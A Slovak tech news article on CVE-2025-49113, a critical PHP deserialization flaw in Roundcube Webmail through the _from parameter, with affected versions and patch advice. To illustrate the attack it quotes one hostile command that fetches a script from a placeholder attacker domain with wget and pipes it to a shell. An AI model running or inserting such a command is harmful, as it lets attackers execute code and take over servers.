Populárna webmailová služba medzi Slovákmi má kritickú chybu. Hacker môže cez ňu ovládnuť server a dostať sa k tvojim e-mailom
V populárnej e-mailovej službe bola objavená kritická zraniteľnosť umožňujúca autentifikovanému útočníkovi získať kontrolu nad serverom. Problém spočíva v nebezpečnej PHP deserializácii a postihuje všetky verzie do 1.6.10. Oprava je už dostupná.
Mohlo by sa zdať, že hackeri útočia len na služby ako Gmail, Facebook a ďalšie. Do ich hľadáčika sa ale častokrát dostanú aj menšie služby, hoci stále s veľkým zastúpením na trhu. Najnovšie sa objavila ďalšia hrozba, ktorá podal všetkého už bola aj viackrát zneužitou a týka sa populárnej služby Roundcube Webmail. Ide o webmailovú služba, ktorého poznajú hlavne majitelia domén, keďže webhostingové služby vo väčšine prípadov používajú Roundcube, cez ktorý vytvárajú e-mailové účty zákazníkom.
Prejdime ale rovno ku chybe, ktorú odhalili experti na bezpečnosť. Zaujímavosťou je, že zraniteľnosť CVE-2025-49113 nebola odhalenou celých 10 rokov a až teraz vyplávala na povrch. Získala extrémne vysoké hodnotenie 9,9 z 10 podľa CVSS, čo ako asi už tušíš, naznačuje jej kritickosť. Cez túto chybu môže útočník získať prístup k serveru.
Útočník môže na serveri spustiť ľubovoľný kód a dostať sa k tvojim správam
Chyba spočíva v tom, že pri určitej URL požiadavke nie je správne overený parameter _from, čo umožňuje autentifikovanému používateľovi vykonať tzv. PHP objektovú deserializáciu. Tým pádom môže útočník spustiť ľubovoľný kód na serveri, čím získa úplnú kontrolu nad systémom.
Zraniteľnosť vzniká v dôsledku neovereného používateľského vstupu, konkrétne z URL parametra s názvom _from, ktorý je spracovávaný v súbore program/actions/settings/upload.php. Tento parameter je priamo vložený do procesu, ktorý vykonáva deserializáciu PHP objektov. Problémom ale je, že deserializácia v PHP znamená prevod reťazca (napr. uloženého alebo prijatého cez sieť) späť na PHP objekt. Ak však obsahuje tento reťazec škodlivý kód alebo špeciálne upravenú štruktúru, môže sa počas deserializácie spustiť nežiadaná činnosť.
V Roundcube nie je parameter _from nijako filtrovaný, a tak útočník môže do URL vložiť svoj vlastný serializovaný objekt. Keď sa táto požiadavka spracováva, PHP deserializuje objekt bez overenia jeho pôvodu a integrity. Ak tento objekt obsahuje volanie systému, napríklad cez príkaz system („wget http://útočníkova.doména/malware.sh | sh“), server ho vykoná. To znamená, že útočník získa možnosť spúšťať príkazy na serveri, čím môže inštalovať škodlivý softvér, pristupovať k súborom alebo vytvoriť zadné vrátka. Inými slovami, je schopný kompromitovať celý systém.
Neprehliadni
Nebezpečné na tomto podvode tiež je, že ide o vzdialený útok, kedy sa nevyžaduje interakcia zo strany používateľa.
Vyššie popísanú chybu nájdeš vo všetkých verziách služby vrátane 1.6.10. Problém rieši až aktualizácia Roundcube na verziu 1.6.11 alebo 1.5.10 LTS. Zraniteľnosť nahlásil Kirillov Firsovov, zakladateľ a generálny riaditeľ spoločnosti FearsOff.
„Táto zraniteľnosť umožňuje autentifikovaným používateľom spúšťať ľubovoľné príkazy cez deserializáciu PHP objektov,“ dodala ruská bezpečnostná spoločnosť.
V prípade, ak máš Roundcube Webmail nainštalovaný na vlastnom serveri, tak by si ho mal čo najskôr aktualizovať. Ak ho používaš ako službu od webhostingu, tak musíš čakať, kým ju poskytovateľ aktualizuje.
Komentáre